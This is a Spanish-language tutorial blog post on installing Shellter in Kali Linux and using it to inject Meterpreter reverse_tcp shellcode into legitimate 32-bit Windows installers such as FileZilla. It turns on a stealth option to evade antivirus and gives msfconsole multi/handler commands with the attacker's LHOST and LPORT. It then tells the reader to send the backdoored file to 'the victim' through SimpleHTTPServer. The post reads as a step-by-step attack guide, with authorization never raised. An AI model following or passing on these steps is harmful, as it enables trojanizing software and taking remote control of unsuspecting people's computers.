Advertisement

header ads

¿CÓMO INSTALAR/USAR SHELLTER DESDE KALI LINUX?

Hoy me desperté muy temprano y he decidido mostrar muchas herramientas en el cual ayer mostré una herramienta y a mucha gente no le ha gustado.



Pero creadpag mostrará pieza por pieza. Es decir puedes hacer un trió o puedes ser una orgía con muchas herramientas combinadas para hacer un buen pentesting.

¿Pero que significa SHELLTER?

Shellter es una herramienta de inyección de código shell dinámica, y probablemente el primero infecta PE dinámico jamás creado.
Se puede utilizar para inyectar código shell en las aplicaciones nativas de Windows (en la actualidad sólo aplicaciones de 32 bits).
El código shell puede ser algo tuyo o algo generado a través de un marco, como Metasploit.
Se aprovecha de la estructura original del archivo PE y no se aplica ninguna modificación como cambiar los permisos de acceso de memoria en las secciones (a menos que el usuario desee), añadiendo una sección extra con acceso RWE, y todo lo que se vería poco fiables bajo una exploración AV .
Shellter utiliza un enfoque dinámico único que se basa en el flujo de ejecución de la aplicación de destino, y esto es sólo la punta del iceberg.
Shellter no es sólo un infector EPO que trata de encontrar un lugar para insertar una instrucción para redireccionar la ejecución a la carga útil. A diferencia de cualquier otra infección,  avanza por  motor de la infección nunca se transfiere el flujo de ejecución a una cueva de código o de una sección añadida en el archivo PE infectada.


Vamos a descargarlo aqui.Shellter V [5.9]

Les explico algo rápido de la herramienta. Ustedes puedes descargar cualquier software de instalación .exe de 32bits puede ser “FILEZILLA” “RAR” “ZIP” etc.
Al obtener este software descargado ustedes solo colocarán ese archivo en su carpeta de SHELLTHER.
cd Downloads/shellter/
Para ejecutarlo
wine shellter.exe
Al ejecutar nos menciona algunas opciones sobre la herramienta.  Colocamos “A” para que sea todo automático.
Y colocamos el software descargado .exe. Recuerden puede ser “FILEZILLA, rar, zip, etc”

Al ejecutar el programa comenzará hacer su inyección en la herramienta.


Nos lanzara otras opciones que te va ha servir para la inyección.
  • Primera opción : Activar Stealth (Y)
  • Segunda opción: LISTA DE PAYLOAD (L)
  • Tercer opción: El numero del PAYLOAD en mi paso usaremos la común y efectiva. (1)
Luego nos pide más opciones es como hicieras el mismo proceso de msfconsole.
SET LHOST= TU IP
SET LPORT=8080-4444
Se recomienda el 8080 pero si gusta puede usar el que quieras.

 Al terminar solo presionamos enter y nos va ha crear otro archivo nombre.exe.bak.
Ahora usaremos nuestra consola para msfconsole.
ACTIVAMOS
service postgresql start
msfconsole
Para ejecutar un exploit usaremos handler
use exploit/multi/handler
set LHOST IP
set LPORT Puerto
Recomiendo 8080
Usaremos el mismo PAYLOAD que ejecutamos con shellter.
set PAYLOAD windows/meterpreter/reverse_tcp
Para ejecutar el exploit
exploit -j
Le enviamos a la victima el paquete.
En el cual usaremos SIMPLEHTTPSERVER   este software no le gusto a la gente pero esta bueno para hacer practicas.
Y listo enviamos el paquete la victima y lo ejecutará y hacemos muchas cosas.
RECUERDEN:
Todos los software puede servir así sea su funcionamiento pequeño pero lo puede hacer una buena combinación. Espero que te guste y compártelo con tus amigos.

Este post se actualiza desde aquí.

Unos de los usuario me reporto que shellter no corría en su maquina y me llamo mucho la atención que decidí a usarla, pero tenia mucha razón con la actualización del 2016.1 esta herramienta no se puede ejecutar pero solo con 64bits porque la de 32bits corre normal.
Pero no vamos ni a formatear la maquina sino vamos a usar un simple comando.

Como ven en la imagen la versión es 1.8 de wine lo que hice fue borrarlo y volverlo a instalar pero no funciono
vamos con la solucion
 apt-get -y --no-install-recommends install wine32
Con ese simple comando podemos usar shellter. Le doy un ejemplo wine era de 64 bits pero el programa corre con 32bits entonces instalamos el wine32 y listo.
Si tienen alguno problema reportarme a mi o  KALI LINUX.

Publicar un comentario

0 Comentarios